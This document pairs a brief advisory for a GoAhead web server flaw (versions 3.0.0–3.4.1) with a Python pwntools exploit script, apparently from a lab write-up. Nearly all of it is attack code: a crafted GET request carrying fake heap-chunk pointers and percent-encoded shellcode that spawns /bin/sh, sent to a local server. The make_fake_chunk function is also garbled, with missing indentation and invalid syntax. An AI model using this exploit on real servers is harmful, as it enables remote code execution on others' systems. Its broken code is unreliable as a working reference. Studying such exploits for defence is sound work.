INFO
EmbedThis GoAhead 3.0.0 through 3.4.1 does not properly handle path segments starting with a . (dot), which allows remote attackers to conduct directory traversal attacks, cause a denial of service (heap-based buffer overflow and crash), or possibly execute arbitrary code via a crafted URI.
EXP
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
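def hex2url(i):
    """Percent-encode the integer ``i`` as little-endian ``%XX`` tokens.

    The value is rendered as upper-case hex, zero-padded to an even
    number of digits, then emitted one byte at a time from least- to
    most-significant, e.g. ``0x01020304`` -> ``'%04%03%02%01'`` and
    ``0`` -> ``'%00'``.

    Args:
        i: non-negative integer to encode (a negative value would leave
           a '-' in the hex text and is not handled).

    Returns:
        The concatenated ``%XX`` token string.
    """
    digits = format(i, 'X')
    # A leading zero keeps the byte pairs aligned when the hex text has
    # an odd number of digits.
    if len(digits) % 2:
        digits = '0' + digits
    # Walk the hex text from its end so the lowest byte comes first;
    # range() rather than xrange keeps this runnable on Python 3 too.
    return ''.join('%' + digits[pos - 2:pos]
                   for pos in range(len(digits), 0, -2))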
def make_fake_chunk(chunk_addr):
chunk = (chunk_addr & ~0xff) + 0x12f
fd = int(format(chunk, '08X'):6, 16)
bk = chunk
return fd, bk, chunk
# Lab target: a GoAhead instance on the local host, port 80.
pro = remote('localhost', 80)
# The addresses below (0x8057840, 0xbffff2ac) are hard-coded; presumably
# they are specific to the binary/environment the author tested against.
chunk = 0x8057840
fd, bk, fake_chunk = make_fake_chunk(chunk)
print(hex(fd), hex(bk), hex(fake_chunk))
# Percent-encoded payload bytes that are appended to the request path.
shellcode = '%eb%16%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90'
shellcode += "%eb%19%5e%31%d2%89%56%07%52%56%89%e1%89%f3%31%c0%b0%0b%cd"
shellcode += "%80%31%db%31%c0%40%cd%80%e8%e2%ff%ff%ff%2f%62%69"
shellcode += "%6e%2f%73%68"
shellcode_addr = fake_chunk + 4 * 4
offset = 0
# The request is a plain HTTP/1.0 GET whose path carries the encoded data.
exp = 'GET /'
exp += hex2url(fd) # fd
exp += hex2url(bk) # bk
exp += hex2url(0xbffff2ac - 20) # fd_next, stack
exp += hex2url(shellcode_addr) # bk_next
pad = fake_chunk - chunk - 16
print('pad:{0}'.format(pad))
# fake chunk
exp += 'A' * (fake_chunk - chunk - 16)
exp += hex2url(0x01020304) # prev_size
exp += hex2url(0x01020304) # size
exp += hex2url(chunk - 8) # fd
exp += hex2url(chunk - 8) # bk
exp += shellcode
# NOTE: len(shellcode)/3 (three characters per encoded byte) relies on
# Python 2 integer division; under Python 3 it yields a float and the
# 'A' * (...) multiplication below raises TypeError.
print('--{}'.format(1024 - (fake_chunk - chunk) - 16 - len(shellcode)/3))
# Path segments beginning with '.' ('/./' here and '/.x' below) are the
# construct the advisory describes; rejecting or normalising dot-leading
# segments in the request path is the detection/mitigation point.
exp += '/./'
# fifty '%02' tokens
exp += hex2url(2) * 50
exp += 'A' * (1024 - (fake_chunk - chunk) - 16 - len(shellcode) / 3 - 50)
exp += '/.x'
exp += ' HTTP/1.0\r\n\r\n'
print(len(exp))
print(exp)
pro.send(exp)
